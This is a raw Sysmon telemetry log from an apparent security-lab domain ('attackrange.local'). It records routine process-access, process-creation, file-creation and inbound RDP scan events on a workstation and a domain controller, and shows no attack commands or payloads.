14:58:56.033{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050645Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:56.033{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050644Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:56.033{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050643Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:56.033{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050642Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:56.033{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050641Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:56.033{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050640Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:56.033{85C0FFC9-B7EC-607E-0500-00000000BB01}416532C:\Windows\system32\csrss.exe{85C0FFC9-EC30-607E-F206-00000000BB01}1972C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000050639Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:56.033{85C0FFC9-B85C-607E-9700-00000000BB01}30763836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{85C0FFC9-EC30-607E-F206-00000000BB01}1972C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000050638Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:56.034{85C0FFC9-EC30-607E-F206-00000000BB01}1972C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{85C0FFC9-B7EC-607E-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000081335Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:55.706{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com56497-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000081334Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:55.385{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-48545-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000081333Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:57.809{A7A01FEF-EC31-607E-610F-00000000BB01}3212NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\B2FNRV1RBR\Microsoft-Windows-HomeGroupDiagnostic.NetListMgr.Interop.ni.dll.auxMD5=DE34691C7D8777D93A975645FD9FB04A,SHA256=89C9788934FC89F97A80FE718713743CCD73F82AC5A46C0A8E602BBDF8D0F36D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081332Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:57.809{A7A01FEF-EC31-607E-610F-00000000BB01}3212NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\B2FNRV1RBR\Microsoft-Windows-HomeGroupDiagnostic.NetListMgr.Interop.ni.dllMD5=5057178A60F257D68CBDC52246CC243A,SHA256=6E1DB3B06EE8F7ECB93140AB88A592BAF0B361E19D86C9F8C776E1DAB6A0D8FF,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000081331Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:57.809{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1E527136A5B32E3314197EEBAB998F8C,SHA256=04519E3F73EAC527146A30F92094530BC6D2D63FB38DF46A0497747213425774,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081330Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:57.700{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC31-607E-610F-00000000BB01}3212C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081329Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:57.669{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC31-607E-610F-00000000BB01}3212C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081328Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:57.669{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC31-607E-610F-00000000BB01}3212C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+315bb|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+31318|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+31229|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1215e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+f549|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74dc|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081327Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:57.591{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC31-607E-600F-00000000BB01}5716C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081326Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:57.591{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC31-607E-600F-00000000BB01}5716C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081325Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:57.591{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC31-607E-600F-00000000BB01}5716C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081324Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:57.544{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC31-607E-5F0F-00000000BB01}6648C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081323Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:57.528{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC31-607E-5F0F-00000000BB01}6648C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081322Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:57.528{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC31-607E-5F0F-00000000BB01}6648C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081321Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:57.497{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC31-607E-5E0F-00000000BB01}1616C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081320Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:57.481{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC31-607E-5E0F-00000000BB01}1616C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081319Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:57.481{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC31-607E-5E0F-00000000BB01}1616C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081318Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:57.419{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC31-607E-5D0F-00000000BB01}6472C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081317Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 